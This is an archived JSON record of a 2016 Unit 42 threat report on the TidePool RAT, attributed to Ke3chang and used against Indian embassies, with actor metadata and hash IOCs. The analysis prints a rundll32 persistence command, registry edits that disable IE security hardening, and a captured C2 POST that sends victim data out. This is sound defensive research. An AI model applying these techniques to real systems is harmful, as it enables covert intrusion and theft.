{
	"id": "d2474f90-ba4a-4102-b152-844f56abf46d",
	"created_at": "2026-04-06T00:12:08.8238Z",
	"updated_at": "2026-04-10T13:12:37.347929Z",
	"deleted_at": null,
	"sha1_hash": "1e35d9d3a1792cd2574378631fe779ac7f15b7eb",
	"title": "Operation Ke3chang Resurfaces With New TidePool Malware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 493262,
	"plain_text": "Operation Ke3chang Resurfaces With New TidePool Malware\r\nBy Micah Yates, Mike Scott, Brandon Levene, Jen Miller-Osborn, Tom Keigher\r\nPublished: 2016-05-22 · Archived: 2026-04-05 16:19:27 UTC\r\nIntroduction\r\nLittle has been published on the threat actors responsible for Operation Ke3chang since the report was released more than\r\ntwo years ago. However, Unit 42 has recently discovered the actors have continued to evolve their custom malware arsenal.\r\nWe’ve discovered a new malware family we’ve named TidePool. It has strong behavioral ties to Ke3chang and is being used\r\nin an ongoing attack campaign against Indian embassy personnel worldwide. This targeting is also consistent with previous\r\nattacker TTPs; Ke3chang historically targeted the Ministry of Affairs, and also conducted several prior campaigns against\r\nIndia.\r\nThough we don’t have comprehensive targeting information, the spear phishing emails we found targeted several Indian\r\nembassies in different countries. One decoy references an annual report filed by over 30 Indian embassies across the globe.\r\nThe sender addresses of the phishing emails spoof real people with ties to Indian embassies, adding legitimacy to the emails\r\nto prompt the recipients to open the attached file. Also noteworthy, the actors are exploiting a relatively new vulnerability in\r\ntheir attacks with TidePool, which is detailed below.\r\nIn this report we will highlight the reuse of the code responsible for a variety of registry changes and command and control\r\ntraffic over time as the Ke3chang actor has evolved their codebase to TidePool since the 2013 report.\r\nExploitation of CVE-2015-2545\r\nThe weaponized document sent in phishing emails triggers the vulnerability outlined in CVE-2015-2545, which was first\r\nmade public in September 2015.  Unlike previously seen exploit carrier docs, this version comes packaged as an MHTML\r\ndocument which by default opens in Microsoft Word.  
We have seen multiple waves of activity with similar exploit docs,\r\nincluding those referenced in our recent Spivy blog. PwC recently released a great report analyzing the exploit documents\r\nthemselves. The samples we are covering are documented in the \"Windows User_A\" section of their report (the malware\r\nthey refer to as \"Danti Downloader\").\r\nThe TidePool Malware Family\r\nTidePool contains many capabilities common to most RATs. It allows the attacker to read, write and delete files and folders,\r\nand run commands over named pipes. TidePool gathers information about the victim's computer, Base64-encodes the data,\r\nand sends it to the Command and Control (C2) server via HTTP, which matches capabilities of the BS2005 malware family\r\nused by the Ke3chang actor.\r\nThe TidePool malware is housed in an MHTML document which exploits CVE-2015-2545. The exploit code drops a DLL\r\ninto\r\nC:\\Documents and Settings\\AllUsers\\IEHelper\\mshtml.dll\r\nThis dropped DLL is the TidePool sample. It also launches Internet Explorer as a subprocess of the svchost service. For\r\npersistence, TidePool utilizes an ActiveSetup key, which will launch itself on boot with the following parameters:\r\nrundll32.exe  C:\\DOCUME~1\\ALLUSE~1\\IEHelper\\mshtml.dll,,IEHelper\r\nThe TidePool sample then sends victim computer information to the C2 server, as shown in Figure 1.
Once a connection is\r\nmade, the sample behaves as a RAT, receiving commands from the C2.\r\nPOST http://goback.strangled.net:443/QCLDDMGXVXESLYT HTTP/1.1\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerp\r\nAccept-Language: en-us\r\nContent-Type: multipart/form-data; boundary=----=_Part_4e67c6a7\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)\r\nHost: goback.strangled.net\r\nContent-Length: 602\r\nhttp://researchcenter.paloaltonetworks.com/2016/05/operation-ke3chang-resurfaces-with-new-tidepool-malware/\r\nPage 1 of 6\n\nProxy-Connection: Keep-Alive\r\nPragma: no-cache\r\n----=_Part_4e67c6a7\r\nContent-Disposition: form-data; name=\"m1.jpg\"\r\nContent-Type: application/octet-steam\r\nWAQAAEYBAABGAQAARgEAAAAAAAAAAAAAhv0OeukKAAAVAAAAHAEAAAUAAAABAAAAKAoAAAIAAABTAGUAcgB2AGkA\r\nFigure 1. The Base64 encoded data contains information about the victim’s service pack level, the current user,\r\nand the NETBIOS name of the victim system.\r\nThe Evolution From BS2005 to TidePool\r\nDuring our initial triage of the TidePool samples in AutoFocus, we noticed Windows Registry modifications that by\r\nthemselves were not unique, but when viewed together were used by multiple malware families. One of these families is the\r\n\"BS2005\" malware family used by the Ke3chang actor. This motivated us to dig deeper, since we had not seen any public\r\nreporting on them since 2013. From this analysis, Unit 42 compared the code bases of the new malware family, and the\r\nBS2005 malware samples. Based on our analysis we believe this new malware, which we are calling TidePool, is an\r\nevolution of the BS2005 malware family used by the Ke3chang actor.\r\nUnit 42 has discovered 11 similar registry modifications that both TidePool and BS2005 employ. 
The registry setting that\r\nTidePool and BS2005 focus on is:\r\nSoftware\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IEHarden -\u003e 0\r\nWhen the IEHarden value is set to 0, it disables the Internet Explorer Enhanced Security Configuration, which is designed to\r\nprevent the execution of scripts, ActiveX Controls, file downloads, and the Microsoft virtual machine for HTML content.\r\nThis is a technique common to both BS2005 and TidePool malware.\r\nBelow is the routine within TidePool that modifies the IEHarden registry settings. The repetition, order, and uniqueness of\r\nthe code base in this function allowed us to link TidePool back to older versions of BS2005 and Operation Ke3chang.\r\nFigure 2. Routine to modify the IEHarden Value linking TidePool to BS2005.\r\nCode reuse overlap also allowed us to link the various interim malware iterations between Ke3chang and TidePool together.\r\nGoing over every single code overlap would be tiresome, so we'll highlight major functional similarities that allowed us to\r\nlink TidePool to Operation Ke3chang. A listing of similar hashes and their compile dates can be found in the IOC section at\r\nthe end of this blog. They are also divided into those that pre-date the Operation Ke3chang report and those that came after.\r\nWe compared 5 key samples that link TidePool to the original Operation Ke3chang malware.
In order of comparison and\r\nusage we looked at:\r\nBS2005 Operation Ke3chang sample\r\n233bd004ad778b7fd816b80380c9c9bd2dba5b694863704ef37643255797b41f\r\n2013 post Ke3chang\r\n012fe5fa86340a90055f7ab71e1e9989db8e7bb7594cd9c8c737c3a6231bc8cc\r\n2014 post Ke3chang\r\n04db80d8da9cd927e7ee8a44bfa3b4a5a126b15d431cbe64a508d4c2e407ec05\r\n2014 post Ke3chang\r\neca724dd63cf7e98ff09094e05e4a79e9f8f2126af3a41ff5144929f8fede4b4\r\n2015 Current TidePool\r\n2252dcd1b6afacde3f94d9557811bb769c4f0af3cb7a48ffe068d31bb7c30e18\r\nStarting with a known Operation Ke3chang BS2005 sample, we focus on the C2 obfuscation. Figure 3 shows the routine for the\r\nfollowing 2 samples:\r\n233bd004ad778b7fd816b80380c9c9bd2dba5b694863704ef37643255797b41f\r\n012fe5fa86340a90055f7ab71e1e9989db8e7bb7594cd9c8c737c3a6231bc8cc\r\nFigure 3. Comparing a BS2005 and post Ke3chang sample C2 obfuscation routine\r\nNot only do BS2005 and TidePool share repeating registry behaviors, they also use a similar code routine to obfuscate the\r\nC2. Further analysis shows that they also share similar Base64 string handling. This routine goes back even further to\r\nMyWeb malware samples, also associated with Operation Ke3chang.\r\nNext we compared the codebase for setting registry keys. The code reuse displayed in Figure 4 is the sequence that sets the\r\nIEHarden registry keys and other keys used throughout TidePool and Operation Ke3chang malware.\r\n012fe5fa86340a90055f7ab71e1e9989db8e7bb7594cd9c8c737c3a6231bc8cc\r\n04db80d8da9cd927e7ee8a44bfa3b4a5a126b15d431cbe64a508d4c2e407ec05\r\nFigure 4. Sequence that sets the IEHarden registry keys and other keys used in TidePool and Operation Ke3chang\r\nsamples.\r\nThe code that handles URL beacon creation is shown in Figure 5.
These functions also displayed quite a bit of code reuse.\r\neca724dd63cf7e98ff09094e05e4a79e9f8f2126af3a41ff5144929f8fede4b4\r\n012fe5fa86340a90055f7ab71e1e9989db8e7bb7594cd9c8c737c3a6231bc8cc\r\nFigure 5. Comparing code blocks responsible for URL creation\r\nFinally, we compared the following two samples.\r\n04db80d8da9cd927e7ee8a44bfa3b4a5a126b15d431cbe64a508d4c2e407ec05\r\n2252dcd1b6afacde3f94d9557811bb769c4f0af3cb7a48ffe068d31bb7c30e18\r\nThese samples are quite similar when looking at the library functions used, but the most notable features they have in\r\ncommon are the timeline of behaviors executed. Ke3chang and TidePool both modify the IEHarden registry key, as well as\r\nthe following list of keys. Setting these registry keys is unique to the Ke3chang and TidePool malware families.\r\nHKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Check_Associations\r\nHKCU\\Software\\Microsoft\\Internet Explorer\\Main\\DisableFirstRunCustomize\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IEharden\r\nA Few Words On Attribution\r\nAttribution is an inexact process; however, we have compiled several interesting findings which lend themselves to our\r\nconclusion that this activity and malware are related to the original Operation Ke3chang.\r\nStrong behavioral overlap between the TidePool malware family and malware called BS2005 utilized by Operation\r\nKe3chang\r\nStrong code reuse and overlap showing a branching and evolution of malware from BS2005 to TidePool.\r\nTargeting and attack method matches historic Ke3chang targeting.\r\nWhen binaries included resources, encoding was 0x04 (LANG_CHINESE) indicating the actor’s system is likely\r\nrunning an operating system and software with Chinese as the default display language.\r\nConclusion\r\nDespite going unreported on since 2013, Operation Ke3chang has not
ceased operations and in fact continued developing its\r\nmalware. Unit 42 was able to track the evolution of Operation Ke3chang’s tools by observing unique behavioral quirks\r\ncommon throughout the malware’s lineage. By pivoting on these behaviors in AutoFocus, we were able to assess a\r\nrelationship between these families dating back to at least 2012 and the creation of TidePool, a new malware family\r\ncontinuing in Ke3chang’s custom malware footsteps. While we can’t know all of the group’s attacks using TidePool or older\r\nmalware, we have uncovered its use against Indian Embassies, which was also documented in the 2013 report, indicating\r\nthis is likely a high priority target as it has continued over multiple years.\r\nCustomers can utilize the Ke3changResurfaces AutoFocus tag to examine the samples discussed in this post. IPS coverage\r\nfor TidePool is provided by TID 14588.\r\nTidePool IOCs\r\nPhishing emails:\r\n4d5e0eddcd014c63123f6a46af7e53b5ac25a7ff7de86f56277fe39bff32c7b5\r\n1896d190ed5c5d04d74f8c2bfe70434f472b43441be824e81a31b7257b717e51\r\nde5060b7e9aaaeb8d24153fe35b77c27c95dadda5a5e727d99f407c8703db649\r\nWeaponized document attachments:\r\n785e8a39eb66e872ff5abee48b7226e99bed2e12bc0f68fc430145a00fe523db\r\neea3f90db41f872da8ed542b37948656b1fb93b12a266e8de82c6c668e60e9fc\r\nTidePool Dropper:\r\n38f2c86041e0446730479cdb9c530298c0c4936722975c4e7446544fd6dcac9f\r\nTidePool dlls:\r\n67c4e8ab0f12fae7b4aeb66f7e59e286bd98d3a77e5a291e8d58b3cfbc1514ed\r\n2252dcd1b6afacde3f94d9557811bb769c4f0af3cb7a48ffe068d31bb7c30e18\r\n9d0a47bdf00f7bd332ddd4cf8d95dd11ebbb945dda3d72aac512512b48ad93ba\r\nC2 domain:\r\ngoback.strangled[.]net\r\nTidePool sample groupings\r\nGroup 1: 3/1/2012 - 3/22/2012\r\n71b548e09fd51250356111f394e5fc64ac54d5a07d9bc57852315484c2046093 (BS2005)\r\n39fdcdf019c0fca350ec5bd3de31b6649456993b3f9642f966d610e0190f9297 (BS2005)\r\nbfa5d062bfc1739e1fcfacefd3a1f95b40104c91201efc618804b6eb9e30c018\r\n4e38848fabd0cb99a8b161f7f4972c080ce5990016212330d7bfbe08ab49526a\r\nd097a1d5f86b3a9585cca42a7785b0ff0d50cd1b61a56c811d854f5f02909a5d\r\n25a3b374894cacd922e7ff870bb19c84a9abfd69405dded13c3a6ceb5abe4d27\r\nGroup 2: 6/1/2012 - 7/10/2012\r\n12cc0fdc4f80942f0ba9039a22e701838332435883fa62d0cefd3992867a9e88 (BS2005)\r\na4fae981b687fe230364508a3324cf6e6daa45ecddd6b7c7b532cdc980679076 (BS2005)\r\nc1a83a9600d69c91c19207a8ee16347202d50873b6dc4613ba4d6a6059610fa1\r\nGroup 3: 8/28/2012 - 11/19/2012\r\n023e8f5922b7b0fcfe86f9196ae82a2abbc6f047c505733c4b0a732caf30e966 (BS2005)\r\n064051e462990b0a530b7bbd5e46b68904a264caee9d825e54245d8c854e7a8a (BS2005)\r\n07aa6f24cec12b3780ebaba2ca756498e3110243ca82dca018b02bd099da36bb (BS2005)\r\ncdb8a15ededa8b4dee4e9b04a00b10bf4b6504b9a05a25ecae0b0aca8df01ff9 (BS2005)\r\nf84a847c0086c92d7f90249be07bbf2602fe97488e2fef8d3e7285384c41b54e (BS2005)\r\n89ccea68f76afa99d4b5d00d35b6d2f229c4af914fbb2763e37f5f87dcf2f7bf\r\nbe378ad63b61b03bdc6fd3ef3b81d3c2d189602a24a960118e074d7aff26c7bd\r\nc5d274418532231a0a225fc1a659dd034f38fde051840f8ed39e0b960d84c056\r\nGroup 4: 4/18/2013 - 11/5/2013\r\n233bd004ad778b7fd816b80380c9c9bd2dba5b694863704ef37643255797b41f (BS2005)\r\n3795fd3e1fe4eb8a56d611d65797e3947acb209ddb2b65551bf067d8e1fa1945 (BS2005)\r\n6d744f8a79e0e937899dbc90b933226e814fa226695a7f0953e26a5b65838c89 (BS2005)\r\nb344b9362ac274ca3547810c178911881ccb44b81847071fa842ffc8edfcd6ec (BS2005)\r\ne72c5703391d4b23fcd6e1d4b8fd18fe2a6d74d05638f1c27d70659fbf2dcc58 (BS2005)\r\n690c4f474553a5da5b90fb43eab5db24f1f2086e6d6fd75105b54e616c490f3f\r\nd64cd5b4caf36d00b255fdaccb542b33b3a7d12aef9939e35fdb1c5f06c2d69c\r\n0ec913017c0adc255f451e8f38956cfc1877e1c3830e528b0eb38964e7dd00ff\r\nPost FireEye's Ke3chang blog\r\nGroup 5: 5/2/2013 - 10/23/2013\r\n012fe5fa86340a90055f7ab71e1e9989db8e7bb7594cd9c8c737c3a6231bc8cc\r\n0f88602a11963818b73a52f00a4f670a0bf5111b49549aa13682b66dd9895155\r\n2a454d9577d75ac76f5acf0082a6dca37be41f7c74e0a4dbd41d8a9a75120f5c\r\n66d9001b6107e16cdb4275672e8dd21b3263481a56f461428909a7c265c67851\r\n863ee162a18d429664443ce5c88a21fd629e22ad739191c7c6a9237f64cdd2f3\r\n8b3ef6112f833d6d232864cf66b57a0f513e0663ee118f8d33d93ad8651af330\r\n904e31e4ab030cba00b06216c81252f6ee189a2d044eca19d2c0dc41508512f3\r\nGroup 6: 03/09/2014\r\nF3c39376aa93b6d17903f1f3d6a557eb91a977dae19b4358ef57e686cd52cc03\r\n7c17ccdd8eba3791773de8bc05ab4854421bc3f2554c7ded00065c10698300fe\r\nGroup 7: 08/26/2014\r\neca724dd63cf7e98ff09094e05e4a79e9f8f2126af3a41ff5144929f8fede4b4\r\nGroup 8: 04/09/2014\r\n04db80d8da9cd927e7ee8a44bfa3b4a5a126b15d431cbe64a508d4c2e407ec05\r\nGroup 9: 3/11/2015\r\n6eb3528436c8005cfba21e88f498f7f9e3cf40540d774ab1819cddf352c5823d\r\nGroup 10: 08/04/2015\r\n6bcf242371315a895298dbe1cdec73805b463c13f9ce8556138fa4fa0a3ad242\r\nGroup 11: 12/28/2015\r\n2252dcd1b6afacde3f94d9557811bb769c4f0af3cb7a48ffe068d31bb7c30e18\r\n38f2c86041e0446730479cdb9c530298c0c4936722975c4e7446544fd6dcac9f\r\n67c4e8ab0f12fae7b4aeb66f7e59e286bd98d3a77e5a291e8d58b3cfbc1514ed\r\n9d0a47bdf00f7bd332ddd4cf8d95dd11ebbb945dda3d72aac512512b48ad93ba\r\nSource: http://researchcenter.paloaltonetworks.com/2016/05/operation-ke3chang-resurfaces-with-new-tidepool-malware/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"http://researchcenter.paloaltonetworks.com/2016/05/operation-ke3chang-resurfaces-with-new-tidepool-malware/"
	],
	"report_names": [
		"operation-ke3chang-resurfaces-with-new-tidepool-malware"
	],
	"threat_actors": [
		{
			"id": "2d7530f9-cd8e-4703-8aed-ab938e3b08cf",
			"created_at": "2023-01-06T13:46:38.620662Z",
			"updated_at": "2026-04-10T02:00:03.04163Z",
			"deleted_at": null,
			"main_name": "Danti",
			"aliases": [],
			"source_name": "MISPGALAXY:Danti",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "4b076dcb-516e-42fb-9c8f-f153902cd5e9",
			"created_at": "2022-10-25T16:07:23.708745Z",
			"updated_at": "2026-04-10T02:00:04.720108Z",
			"deleted_at": null,
			"main_name": "Hidden Lynx",
			"aliases": [
				"Aurora Panda",
				"Group 8",
				"Heart Typhoon",
				"Hidden Lynx",
				"Operation SMN"
			],
			"source_name": "ETDA:Hidden Lynx",
			"tools": [
				"AGENT.ABQMR",
				"AGENT.AQUP.DROPPER",
				"AGENT.BMZA",
				"AGENT.GUNZ",
				"BlackCoffee",
				"HiKit",
				"MCRAT.A",
				"Mdmbot.E",
				"Moudoor",
				"Naid",
				"PNGRAT",
				"Trojan.Naid",
				"ZoxPNG",
				"gresim"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "cf7fc640-acfe-41c4-9f3d-5515d53a3ffb",
			"created_at": "2023-01-06T13:46:38.228042Z",
			"updated_at": "2026-04-10T02:00:02.883048Z",
			"deleted_at": null,
			"main_name": "APT1",
			"aliases": [
				"PLA Unit 61398",
				"Comment Crew",
				"Byzantine Candor",
				"Comment Group",
				"GIF89a",
				"Group 3",
				"TG-8223",
				"Brown Fox",
				"ShadyRAT",
				"G0006",
				"COMMENT PANDA"
			],
			"source_name": "MISPGALAXY:APT1",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "0a03e7f0-2f75-4153-9c4f-c46d12d3962e",
			"created_at": "2022-10-25T15:50:23.453824Z",
			"updated_at": "2026-04-10T02:00:05.28793Z",
			"deleted_at": null,
			"main_name": "Ke3chang",
			"aliases": [
				"Ke3chang",
				"APT15",
				"Vixen Panda",
				"GREF",
				"Playful Dragon",
				"RoyalAPT",
				"Nylon Typhoon"
			],
			"source_name": "MITRE:Ke3chang",
			"tools": [
				"Okrum",
				"Systeminfo",
				"netstat",
				"spwebmember",
				"Mimikatz",
				"Tasklist",
				"MirageFox",
				"Neoichor",
				"ipconfig"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "761d1fb2-60e3-46f0-9f1c-c8a9715967d4",
			"created_at": "2023-01-06T13:46:38.269054Z",
			"updated_at": "2026-04-10T02:00:02.90356Z",
			"deleted_at": null,
			"main_name": "APT3",
			"aliases": [
				"GOTHIC PANDA",
				"TG-0110",
				"Buckeye",
				"Group 6",
				"Boyusec",
				"BORON",
				"BRONZE MAYFAIR",
				"Red Sylvan",
				"Brocade Typhoon"
			],
			"source_name": "MISPGALAXY:APT3",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "a7aefdda-98f1-4790-a32d-14cc99de2d60",
			"created_at": "2023-01-06T13:46:38.281844Z",
			"updated_at": "2026-04-10T02:00:02.909711Z",
			"deleted_at": null,
			"main_name": "APT17",
			"aliases": [
				"BRONZE KEYSTONE",
				"G0025",
				"Group 72",
				"G0001",
				"HELIUM",
				"Heart Typhoon",
				"Group 8",
				"AURORA PANDA",
				"Hidden Lynx",
				"Tailgater Team"
			],
			"source_name": "MISPGALAXY:APT17",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "593dd07d-853c-46cd-8117-e24061034bbf",
			"created_at": "2025-08-07T02:03:24.648074Z",
			"updated_at": "2026-04-10T02:00:03.625859Z",
			"deleted_at": null,
			"main_name": "BRONZE OVERBROOK",
			"aliases": [
				"Danti ",
				"DragonOK ",
				"Samurai Panda ",
				"Shallow Taurus ",
				"Temp.DragonOK "
			],
			"source_name": "Secureworks:BRONZE OVERBROOK",
			"tools": [
				"Aveo",
				"DDKONG",
				"Godzilla Webshell",
				"HelloBridge",
				"IsSpace",
				"NFLog Trojan",
				"PLAINTEE",
				"PlugX",
				"Rambo"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "7d5531e2-0ad1-4237-beed-af009035576f",
			"created_at": "2024-05-01T02:03:07.977868Z",
			"updated_at": "2026-04-10T02:00:03.817883Z",
			"deleted_at": null,
			"main_name": "BRONZE PALACE",
			"aliases": [
				"APT15 ",
				"BRONZE DAVENPORT ",
				"BRONZE IDLEWOOD ",
				"CTG-6119 ",
				"CTG-6119 ",
				"CTG-9246 ",
				"Ke3chang ",
				"NICKEL ",
				"Nylon Typhoon ",
				"Playful Dragon",
				"Vixen Panda "
			],
			"source_name": "Secureworks:BRONZE PALACE",
			"tools": [
				"BMW",
				"BS2005",
				"Enfal",
				"Mirage",
				"RoyalCLI",
				"RoyalDNS"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "7c8cf02c-623a-4793-918b-f908675a1aef",
			"created_at": "2023-01-06T13:46:38.309165Z",
			"updated_at": "2026-04-10T02:00:02.921721Z",
			"deleted_at": null,
			"main_name": "APT15",
			"aliases": [
				"Metushy",
				"Lurid",
				"Social Network Team",
				"Royal APT",
				"BRONZE DAVENPORT",
				"BRONZE IDLEWOOD",
				"VIXEN PANDA",
				"Ke3Chang",
				"Playful Dragon",
				"BRONZE PALACE",
				"G0004",
				"Red Vulture",
				"Nylon Typhoon"
			],
			"source_name": "MISPGALAXY:APT15",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "06f622cb-3a78-49cf-9a4c-a6007a69325f",
			"created_at": "2022-10-25T16:07:23.315239Z",
			"updated_at": "2026-04-10T02:00:04.537826Z",
			"deleted_at": null,
			"main_name": "APT 3",
			"aliases": [
				"APT 3",
				"Boron",
				"Brocade Typhoon",
				"Bronze Mayfair",
				"Buckeye",
				"G0022",
				"Gothic Panda",
				"Group 6",
				"Operation Clandestine Fox",
				"Operation Clandestine Fox, Part Deux",
				"Operation Clandestine Wolf",
				"Operation Double Tap",
				"Red Sylvan",
				"TG-0110",
				"UPS Team"
			],
			"source_name": "ETDA:APT 3",
			"tools": [
				"APT3 Keylogger",
				"Agent.dhwf",
				"BKDR_HUPIGON",
				"Backdoor.APT.CookieCutter",
				"Badey",
				"Bemstour",
				"CookieCutter",
				"Destroy RAT",
				"DestroyRAT",
				"DoublePulsar",
				"EXL",
				"EternalBlue",
				"HTran",
				"HUC Packet Transmit Tool",
				"Hupigon",
				"Hupigon RAT",
				"Kaba",
				"Korplug",
				"LaZagne",
				"MFC Huner",
				"OSInfo",
				"Pirpi",
				"PlugX",
				"RedDelta",
				"RemoteCMD",
				"SHOTPUT",
				"Sogu",
				"TIGERPLUG",
				"TTCalc",
				"TVT",
				"Thoper",
				"Xamtrav",
				"remotecmd",
				"shareip",
				"w32times"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "17b1b76b-16da-4c4f-8b32-f6fede3eda8c",
			"created_at": "2022-10-25T16:07:23.750796Z",
			"updated_at": "2026-04-10T02:00:04.736762Z",
			"deleted_at": null,
			"main_name": "Ke3chang",
			"aliases": [
				"APT 15",
				"BackdoorDiplomacy",
				"Bronze Davenport",
				"Bronze Idlewood",
				"Bronze Palace",
				"CTG-9246",
				"G0004",
				"G0135",
				"GREF",
				"Ke3chang",
				"Metushy",
				"Nylon Typhoon",
				"Operation Ke3chang",
				"Operation MirageFox",
				"Playful Dragon",
				"Playful Taurus",
				"PurpleHaze",
				"Red Vulture",
				"Royal APT",
				"Social Network Team",
				"Vixen Panda"
			],
			"source_name": "ETDA:Ke3chang",
			"tools": [
				"Agentemis",
				"Anserin",
				"BS2005",
				"BleDoor",
				"CarbonSteal",
				"Cobalt Strike",
				"CobaltStrike",
				"DarthPusher",
				"DoubleAgent",
				"EternalBlue",
				"GoldenEagle",
				"Graphican",
				"HenBox",
				"HighNoon",
				"IRAFAU",
				"Ketrican",
				"Ketrum",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"MS Exchange Tool",
				"Mebroot",
				"Mimikatz",
				"MirageFox",
				"NBTscan",
				"Okrum",
				"PluginPhantom",
				"PortQry",
				"ProcDump",
				"PsList",
				"Quarian",
				"RbDoor",
				"RibDoor",
				"Royal DNS",
				"RoyalCli",
				"RoyalDNS",
				"SAMRID",
				"SMBTouch",
				"SilkBean",
				"Sinowal",
				"SpyWaller",
				"Theola",
				"TidePool",
				"Torpig",
				"Turian",
				"Winnti",
				"XSLCmd",
				"cobeacon",
				"nbtscan",
				"netcat",
				"spwebmember"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "3aaf0755-5c9b-4612-9f0e-e266ef1bdb4b",
			"created_at": "2022-10-25T16:07:23.480196Z",
			"updated_at": "2026-04-10T02:00:04.626125Z",
			"deleted_at": null,
			"main_name": "Comment Crew",
			"aliases": [
				"APT 1",
				"BrownFox",
				"Byzantine Candor",
				"Byzantine Hades",
				"Comment Crew",
				"Comment Panda",
				"G0006",
				"GIF89a",
				"Group 3",
				"Operation Oceansalt",
				"Operation Seasalt",
				"Operation Siesta",
				"Shanghai Group",
				"TG-8223"
			],
			"source_name": "ETDA:Comment Crew",
			"tools": [
				"Auriga",
				"Cachedump",
				"Chymine",
				"CookieBag",
				"Darkmoon",
				"GDOCUPLOAD",
				"GLOOXMAIL",
				"GREENCAT",
				"Gen:Trojan.Heur.PT",
				"GetMail",
				"Hackfase",
				"Hacksfase",
				"Helauto",
				"Kurton",
				"LETSGO",
				"LIGHTBOLT",
				"LIGHTDART",
				"LOLBAS",
				"LOLBins",
				"LONGRUN",
				"Living off the Land",
				"Lslsass",
				"MAPIget",
				"ManItsMe",
				"Mimikatz",
				"MiniASP",
				"Oceansalt",
				"Pass-The-Hash Toolkit",
				"Poison Ivy",
				"ProcDump",
				"Riodrv",
				"SPIVY",
				"Seasalt",
				"ShadyRAT",
				"StarsyPound",
				"TROJAN.COOKIES",
				"TROJAN.FOXY",
				"TabMsgSQL",
				"Tarsip",
				"Trojan.GTALK",
				"WebC2",
				"WebC2-AdSpace",
				"WebC2-Ausov",
				"WebC2-Bolid",
				"WebC2-Cson",
				"WebC2-DIV",
				"WebC2-GreenCat",
				"WebC2-Head",
				"WebC2-Kt3",
				"WebC2-Qbp",
				"WebC2-Rave",
				"WebC2-Table",
				"WebC2-UGX",
				"WebC2-Yahoo",
				"Wordpress Bruteforcer",
				"bangat",
				"gsecdump",
				"pivy",
				"poisonivy",
				"pwdump",
				"zxdosml"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434328,
	"ts_updated_at": 1775826757,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1e35d9d3a1792cd2574378631fe779ac7f15b7eb.pdf",
		"text": "https://archive.orkl.eu/1e35d9d3a1792cd2574378631fe779ac7f15b7eb.txt",
		"img": "https://archive.orkl.eu/1e35d9d3a1792cd2574378631fe779ac7f15b7eb.jpg"
	}
}